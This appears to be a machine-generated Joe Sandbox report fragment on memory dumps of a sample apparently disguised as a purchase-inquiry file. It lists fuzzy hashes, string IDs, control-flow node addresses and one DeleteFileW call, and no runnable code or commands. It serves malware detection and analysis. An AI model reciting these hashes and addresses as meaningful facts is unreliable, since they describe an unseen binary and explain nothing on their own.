                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D@$D@
                                                                    • API String ID: 0-548349879
                                                                    • Opcode ID: 8c3899d45c480d59996f3c613288e25b5518c2b1f26bf99c5cd8f0f0d5abbd5a
                                                                    • Instruction ID: 766e82459ab97456612e8f1c12cd6f8170c78eb73365d50aa424a0c6e30efc5e
                                                                    • Opcode Fuzzy Hash: 8c3899d45c480d59996f3c613288e25b5518c2b1f26bf99c5cd8f0f0d5abbd5a
                                                                    • Instruction Fuzzy Hash: 2A51A0B5A002198FCB10CFA9C88079FBBB6FF89710F11852AD809EB341E734A945CBD1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3697 3a7c8277-3a7c827a 3698 3a7c827c-3a7c8282 3697->3698 3699 3a7c82b6 3697->3699 3700 3a7c82be-3a7c82d3 3698->3700 3701 3a7c8284-3a7c82b2 3698->3701 3699->3700 3702 3a7c82d8-3a7c82f6 3700->3702 3701->3702 3703 3a7c82b4 3701->3703 3707 3a7c830e-3a7c8324 3702->3707 3708 3a7c82f8-3a7c8300 3702->3708 3703->3699 3711 3a7c832f-3a7c8331 3707->3711 3708->3707 3712 3a7c8349-3a7c83ba 3711->3712 3713 3a7c8333-3a7c833b 3711->3713 3723 3a7c83bc-3a7c83df 3712->3723 3724 3a7c83e6-3a7c8402 3712->3724 3713->3712 3723->3724 3729 3a7c842e-3a7c8449 3724->3729 3730 3a7c8404-3a7c8427 3724->3730 3735 3a7c844b-3a7c846d 3729->3735 3736 3a7c8474-3a7c848f 3729->3736 3730->3729 3735->3736 3741 3a7c84ba-3a7c8bb9 3736->3741 3742 3a7c8491-3a7c84b3 3736->3742 3742->3741
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $sq$$sq
                                                                    • API String ID: 0-1184984226
                                                                    • Opcode ID: 322538c761dba11401d0e2eef76c0d7a883eca8d6f896ab9364e10a329f2f5e8
                                                                    • Instruction ID: c033bb2c21e6347f289e841ddd33b1e94f72bc8517edfc9727daa91683b1ee1b
                                                                    • Opcode Fuzzy Hash: 322538c761dba11401d0e2eef76c0d7a883eca8d6f896ab9364e10a329f2f5e8
                                                                    • Instruction Fuzzy Hash: 79517F74B002068BDF59DBB4D991BAEB7F7EB88340F508469D806EB355EE34DD068B90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3747 3a7c42f1-3a7c42f2 3748 3a7c432e 3747->3748 3749 3a7c42f4-3a7c42f6 3747->3749 3750 3a7c4330 3748->3750 3751 3a7c43a1-3a7c444b 3748->3751 3752 3a7c42f8-3a7c42fe 3749->3752 3753 3a7c4332-3a7c4339 3749->3753 3750->3753 3777 3a7c44ce-3a7c44d5 3751->3777 3778 3a7c4451-3a7c449e call 3a7c4ba8 3751->3778 3754 3a7c433a-3a7c4345 3752->3754 3755 3a7c4300-3a7c4324 3752->3755 3753->3754 3758 3a7c434a-3a7c434d 3754->3758 3756 3a7c4326-3a7c4329 3755->3756 3756->3758 3759 3a7c432b 3756->3759 3762 3a7c4a2c-3a7c4a2e 3758->3762 3763 3a7c4353-3a7c43a0 3758->3763 3759->3748 3764 3a7c4a35-3a7c4a38 3762->3764 3765 3a7c4a30 3762->3765 3763->3751 3764->3756 3766 3a7c4a3e-3a7c4a4b 3764->3766 3765->3764 3779 3a7c4559-3a7c4562 3777->3779 3780 3a7c44db-3a7c454b 3777->3780 3791 3a7c44a4-3a7c44c0 3778->3791 3779->3766 3797 3a7c454d 3780->3797 3798 3a7c4556 3780->3798 3794 3a7c44cb-3a7c44cc 3791->3794 3795 3a7c44c2 3791->3795 3794->3777 3795->3794 3797->3798 3798->3779
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fxq$XPxq
                                                                    • API String ID: 0-4213525876
                                                                    • Opcode ID: c58244ffc28cb093e2982817038d620dab9982811890eb8940a875f665e87b5a
                                                                    • Instruction ID: cdc1db9788e4293228b74afcb3a9e7138978a9024ed94adac60e86a67e844e8e
                                                                    • Opcode Fuzzy Hash: c58244ffc28cb093e2982817038d620dab9982811890eb8940a875f665e87b5a
                                                                    • Instruction Fuzzy Hash: EF517474B002199FDB159BA5C85579EBBF6FF88700F20812AE106EB395DA748D059B90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 4039 116cf1-116d42 4042 116d44-116d47 4039->4042 4043 116d4a-116d75 DeleteFileW 4039->4043 4042->4043 4044 116d77-116d7d 4043->4044 4045 116d7e-116da6 4043->4045 4044->4045
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00116D68
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111694829682.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_110000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: f27d6881727faedf8c79aa3368bfb6b0624bfcbb3c6e8ff26644cf45d4735ba2
                                                                    • Instruction ID: ba6c85f714bef6e86ec872280c0bc24edd8551b0c558fa0e2feeebc2f5455f5e
                                                                    • Opcode Fuzzy Hash: f27d6881727faedf8c79aa3368bfb6b0624bfcbb3c6e8ff26644cf45d4735ba2
                                                                    • Instruction Fuzzy Hash: D52158B1D0065A9FCB10CFAAD5447EEFBB4EF49320F14856AD858B7240D738A984CFA1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 4048 115bec-116d42 4051 116d44-116d47 4048->4051 4052 116d4a-116d75 DeleteFileW 4048->4052 4051->4052 4053 116d77-116d7d 4052->4053 4054 116d7e-116da6 4052->4054 4053->4054
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00116D68
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111694829682.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_110000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: e83985e0d1535ee46ca94f2ae10f946d4bdc9261335286d1346a1a8c1611cdc5
                                                                    • Instruction ID: dbce123e98540619da5d1b6e77b5c1a3c71fe363a295ca7ae5f66c3fdabc31aa
                                                                    • Opcode Fuzzy Hash: e83985e0d1535ee46ca94f2ae10f946d4bdc9261335286d1346a1a8c1611cdc5
                                                                    • Instruction Fuzzy Hash: 792156B1D0065A9FCB14CFAAD5447EEFBB4EF08320F15852AD858B7240D378A980CFA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHsq
                                                                    • API String ID: 0-3083888473
                                                                    • Opcode ID: b2189876123be65153ad800c9d47f31830723a13686767fa726cdc6497006e5d
                                                                    • Instruction ID: ec1c41ce72b40d7555dea375fddfa6cff6858385aa7008bd0eb86dd7d2c2f59a
                                                                    • Opcode Fuzzy Hash: b2189876123be65153ad800c9d47f31830723a13686767fa726cdc6497006e5d
                                                                    • Instruction Fuzzy Hash: 5C412335B002118FDB099B74C8946AE7BE3EF89340B64446DD406DB39AEF35DD478B91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHsq
                                                                    • API String ID: 0-3083888473
                                                                    • Opcode ID: 5b94b09435d6e3a8ee04af6f37648282755d47d4b296b5fa606b284d118aae09
                                                                    • Instruction ID: 3a0a1ff6907a21279d8c63e81825ab7f6895a9887c2daf9fdc8dd2a0affad8a3
                                                                    • Opcode Fuzzy Hash: 5b94b09435d6e3a8ee04af6f37648282755d47d4b296b5fa606b284d118aae09
                                                                    • Instruction Fuzzy Hash: 8441C371A043059BEB25DF74C49879EBFB3EF85740F244929D405EF250EB74994ACB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :
                                                                    • API String ID: 0-336475711
                                                                    • Opcode ID: cc1d48a56102bbe065820182ce70bcadda35cd553c7a10dce1191503a02c9862
                                                                    • Instruction ID: d57f312325e231d4e59f007f9def8afc25b72c726f37a494b1ff895e0408629d
                                                                    • Opcode Fuzzy Hash: cc1d48a56102bbe065820182ce70bcadda35cd553c7a10dce1191503a02c9862
                                                                    • Instruction Fuzzy Hash: CB416171E002199BDB15CFA5C8D0ADEBBF2AF99700F158129E411BB250EB70AD4ACBD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XVt:
                                                                    • API String ID: 0-3398684435
                                                                    • Opcode ID: edf3dfef50e123833e781f1c0190d6da92187ec01d128557913c8264a30dc56b
                                                                    • Instruction ID: 1c13d74228717e4213de94b60e533bedfee635358b9d28b1a8de3f3aa48b366c
                                                                    • Opcode Fuzzy Hash: edf3dfef50e123833e781f1c0190d6da92187ec01d128557913c8264a30dc56b
                                                                    • Instruction Fuzzy Hash: EC41E770B003445FEB149FB98C91B9EBBB6FF89760F248129E555EB3C6DA349C068790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHsq
                                                                    • API String ID: 0-3083888473
                                                                    • Opcode ID: 45d34db50bb6cfaa8b42b7d04163014d95603126ac9ea8731b7d825b72b26f47
                                                                    • Instruction ID: c72cc8d002217c1646f9aeb3212a39b45ea3b305c26702c76446a54ba3be0b8d
                                                                    • Opcode Fuzzy Hash: 45d34db50bb6cfaa8b42b7d04163014d95603126ac9ea8731b7d825b72b26f47
                                                                    • Instruction Fuzzy Hash: 404115747042819FDB05AB34C49029F7FA3AB89340F6445B9D402DB392EE35CD0ACB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XVt:
                                                                    • API String ID: 0-3398684435
                                                                    • Opcode ID: ce058ce900545ecea75ea892b9bb99f273802d0876074f01b503b72229017f18
                                                                    • Instruction ID: 0b818c9fa3c458a0dbec27de39bb5927e22749ce8f42312b75ebbe408d9cb43a
                                                                    • Opcode Fuzzy Hash: ce058ce900545ecea75ea892b9bb99f273802d0876074f01b503b72229017f18
                                                                    • Instruction Fuzzy Hash: 57318570B002045FEB149BADCC91B9FBAB6FBC8760F248529E159EB3C5DA74DC018B90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHsq
                                                                    • API String ID: 0-3083888473
                                                                    • Opcode ID: 031e76d773e3ae49f91a0640955b279f26d5726b8292269e23d75d8be366eeb3
                                                                    • Instruction ID: 5d01d642a233a58af53d00797536256478d45b278e01d8bac926c0d237149ba0
                                                                    • Opcode Fuzzy Hash: 031e76d773e3ae49f91a0640955b279f26d5726b8292269e23d75d8be366eeb3
                                                                    • Instruction Fuzzy Hash: 1331ED34B002058FEB08AB74C4A56AF7AA3EBC9740F644578D406EB395EE35DD0ACB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hwq
                                                                    • API String ID: 0-933684408
                                                                    • Opcode ID: 34de1f79320fdf710176be602b17b3bbcce223b752f7ef0aace0d5202350b591
                                                                    • Instruction ID: 8ab91a930ecf934db4151be7bb3762eb3a299baf3253b52faf358c9e5b047fad
                                                                    • Opcode Fuzzy Hash: 34de1f79320fdf710176be602b17b3bbcce223b752f7ef0aace0d5202350b591
                                                                    • Instruction Fuzzy Hash: E8312A71900209CFCF01DFA9D890ADEBFB2FF88310F244159E515AB391DB399956DB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Pt:
                                                                    • API String ID: 0-3401337478
                                                                    • Opcode ID: 855789530c731d6c1f8ed36acdbc039c2ace7e6b331a105ab71dd9e1eb1f5dc2
                                                                    • Instruction ID: 70a44d9032320cc439502b4ce7155e7ed63d2e7be908f79f46bc7da929ce5583
                                                                    • Opcode Fuzzy Hash: 855789530c731d6c1f8ed36acdbc039c2ace7e6b331a105ab71dd9e1eb1f5dc2
                                                                    • Instruction Fuzzy Hash: 471129313082944FCF0B5B7898606AE3FA39FD9200B04406BE905DB392EE394D1697E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gt:
                                                                    • API String ID: 0-3952654739
                                                                    • Opcode ID: 534829fe67e56c5eee4aab35d132fe9e1994d8448608503849859cf61ceeaefe
                                                                    • Instruction ID: 392a20053cb0e86a6fbfb69f311a61b1d05c77b82feade2604613112c45edf3b
                                                                    • Opcode Fuzzy Hash: 534829fe67e56c5eee4aab35d132fe9e1994d8448608503849859cf61ceeaefe
                                                                    • Instruction Fuzzy Hash: 7811D375E002159BCB28DBB9C8805DEFBB6EB89310F10857AE406EF310EE319949CBD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |
                                                                    • API String ID: 0-2343686810
                                                                    • Opcode ID: 79dfb3310fbc8af86fa56b7d5e0eb14badef11466df3b0347ef5dddfb1b98f11
                                                                    • Instruction ID: f5304b5e78f8328ed67928b31002b50df07e5d2da5c92df138a0d26ed193480a
                                                                    • Opcode Fuzzy Hash: 79dfb3310fbc8af86fa56b7d5e0eb14badef11466df3b0347ef5dddfb1b98f11
                                                                    • Instruction Fuzzy Hash: 05115B74F002259FDB54DB789844BADBBF1AF88710F10846EE94AE73A1DB759C01CB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |
                                                                    • API String ID: 0-2343686810
                                                                    • Opcode ID: 8ca55e9cc05f838efe77b66f2bd9e466f2d57aa8b6dbe26c8d7aba93c7c2a323
                                                                    • Instruction ID: d066a422d6dd023175b3a9837f5ed91f8aec9c7fa46ef832c4f90a99faa29070
                                                                    • Opcode Fuzzy Hash: 8ca55e9cc05f838efe77b66f2bd9e466f2d57aa8b6dbe26c8d7aba93c7c2a323
                                                                    • Instruction Fuzzy Hash: EB012B71B443159FEB154738594479D7BF1EF88764F00845ED446DB392CF7998019BC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $sq
                                                                    • API String ID: 0-923501781
                                                                    • Opcode ID: fc58f6a3c3d61e7ddb0319d0e4491f7394bfe0c6808a983828d6213a03410c66
                                                                    • Instruction ID: 8755eedccc864ada085160702ef3bde711b91fc3f4e536a292533995d49ee20a
                                                                    • Opcode Fuzzy Hash: fc58f6a3c3d61e7ddb0319d0e4491f7394bfe0c6808a983828d6213a03410c66
                                                                    • Instruction Fuzzy Hash: EA01D2B5A042559FDF268EF0C8C06EABF76FB82360F550069E901AF651FA30894BC690
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8 t:
                                                                    • API String ID: 0-2714316018
                                                                    • Opcode ID: 323c329b83c0c62a632ff9c9a9f7153db483deec92888107923ae0d91b64a72d
                                                                    • Instruction ID: 9b36a07e0d295775d9070bc9c66cb7c114763f77826d833255c41aeff21b370f
                                                                    • Opcode Fuzzy Hash: 323c329b83c0c62a632ff9c9a9f7153db483deec92888107923ae0d91b64a72d
                                                                    • Instruction Fuzzy Hash: 74E0C235B002215F1909AA98A0E11DDA7A2E7C67947040566D810DB305EB298D1B83C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8 t:
                                                                    • API String ID: 0-2714316018
                                                                    • Opcode ID: e11482be82c696d45b9016eb4ddcdb9340da37e8b342136181e62f0f78347da5
                                                                    • Instruction ID: 023ecf0d6cb7e129a5b455869d68324073f1181949a2f36108490adee461f073
                                                                    • Opcode Fuzzy Hash: e11482be82c696d45b9016eb4ddcdb9340da37e8b342136181e62f0f78347da5
                                                                    • Instruction Fuzzy Hash: E8E0C23A7002255F5A0866A8A4E20DC77A6E7C43A0B004176E815DB306FE298D0B43C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d4a35bb5754c4d384f60e8aff5ef3b3f2d28bbf572f854b7989cf9170cb65d07
                                                                    • Instruction ID: 8e7f188f84aa37e9b244e062d50af3cfb488acffc948f4aa51dff3895aaa5638
                                                                    • Opcode Fuzzy Hash: d4a35bb5754c4d384f60e8aff5ef3b3f2d28bbf572f854b7989cf9170cb65d07
                                                                    • Instruction Fuzzy Hash: 1FA1AF74A102098FDB05DFA4C594A9EBBB2FF84300F258579D806AF355EB35ED4ACB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44777f2a3b2204e9578997cb64d636b97caf68a797c094e67f973a1bd1ea2565
                                                                    • Instruction ID: 83ff59cdead9bf8f75b23b171626df3a08d36955d751e09136db389f8f3e9e14
                                                                    • Opcode Fuzzy Hash: 44777f2a3b2204e9578997cb64d636b97caf68a797c094e67f973a1bd1ea2565
                                                                    • Instruction Fuzzy Hash: DE814E74B002068BDF58DFB8C5D479EBBB3AF89340F208429D40AEB355EA35DD468B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e60e699873419fbfaff865eaa40397f2e3672ec196b2edf15935a868500a4594
                                                                    • Instruction ID: 5184705f610afd995724c58b3e9e3aca98bed40e0580731f54255c54ddda62ac
                                                                    • Opcode Fuzzy Hash: e60e699873419fbfaff865eaa40397f2e3672ec196b2edf15935a868500a4594
                                                                    • Instruction Fuzzy Hash: 8B913E74E006198BDB54DF68C890B8DFBB2FF89314F208599D549BB245EB70AA85CF90
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da7be775397edb8481bd68caac4b8641654f4df8aa8999a1cd4e631b7f1bd423
                                                                    • Instruction ID: 5a1dac26faf12efed0f1f0f8847fc342fbebfd2fb4882e92c96d5e890f5fd67e
                                                                    • Opcode Fuzzy Hash: da7be775397edb8481bd68caac4b8641654f4df8aa8999a1cd4e631b7f1bd423
                                                                    • Instruction Fuzzy Hash: 0A817F74A102058FDB09DFA4C594A9EBBF2FF84300F658529D806AF355EB75EC4ACB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54cd23426822dab0c2902a17fa35151403497deaabdf0b5ca8334d02cdd52a58
                                                                    • Instruction ID: da47450ac26345a9aa9937c610a986932a97fa0a0e155e4f120519b08be6c517
                                                                    • Opcode Fuzzy Hash: 54cd23426822dab0c2902a17fa35151403497deaabdf0b5ca8334d02cdd52a58
                                                                    • Instruction Fuzzy Hash: FC714F74A102098FDB09DFA4C594A9EBBF2FF84340F258529D816AF355EB75EC46CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3482f2c166c23a4b1e08a5b745ed577cc112d6279080093ed96418dcca64d54
                                                                    • Instruction ID: 2b9b0c43c5a9ca8db61a3d0cd5cf82d892cf976aca84d5e047f142235534dd66
                                                                    • Opcode Fuzzy Hash: b3482f2c166c23a4b1e08a5b745ed577cc112d6279080093ed96418dcca64d54
                                                                    • Instruction Fuzzy Hash: ED51D035E04109DFEB05ABB8E9956DEBBB2EF88351F10896EE046E7351DF358845CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf8cdc9c2bf67bc9d05ee549247a0b2f640e42236a46c4781bf357a2c645242c
                                                                    • Instruction ID: b38fbd8845760d1739176ae0be0fc37d0c9a2773e416599dedd450aa9a5bc44e
                                                                    • Opcode Fuzzy Hash: bf8cdc9c2bf67bc9d05ee549247a0b2f640e42236a46c4781bf357a2c645242c
                                                                    • Instruction Fuzzy Hash: F551A0747002120BEB995BF8C4D075F2EEBD789750F24442AE40ADB384EA68CD5793E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36e01d9f61eddf1ed195638c3b208227309d7a44cd8c0577511a4fc92f57ccf7
                                                                    • Instruction ID: 86c121acd42bfc30ae125199523191916b01ee74a2be84312654e5a60ff0440d
                                                                    • Opcode Fuzzy Hash: 36e01d9f61eddf1ed195638c3b208227309d7a44cd8c0577511a4fc92f57ccf7
                                                                    • Instruction Fuzzy Hash: 35516070A003069FDB14CF64C594A8EBBB2EF84340F258569D405AF355EB75ED8BCB80
